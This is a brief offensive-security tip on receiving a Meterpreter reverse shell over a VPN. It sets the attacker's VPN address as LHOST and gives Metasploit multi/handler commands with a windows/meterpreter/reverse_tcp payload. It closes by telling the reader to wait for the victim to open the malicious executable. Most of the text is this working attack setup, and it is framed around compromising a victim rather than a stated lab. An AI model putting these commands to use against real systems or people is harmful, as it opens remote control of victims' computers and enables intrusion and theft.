Meterpreter session over VPN

If you are using a reverse shell, you need to set LHOST with the attacker VPN IP, not your internal LAN IP. Also you need to listen locally with Metasploit to a specific port that you should set on LPORT and must be the same of msfvenom (es. 443). To achieve this you can use:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

Then just wait the victim open your malicious executable file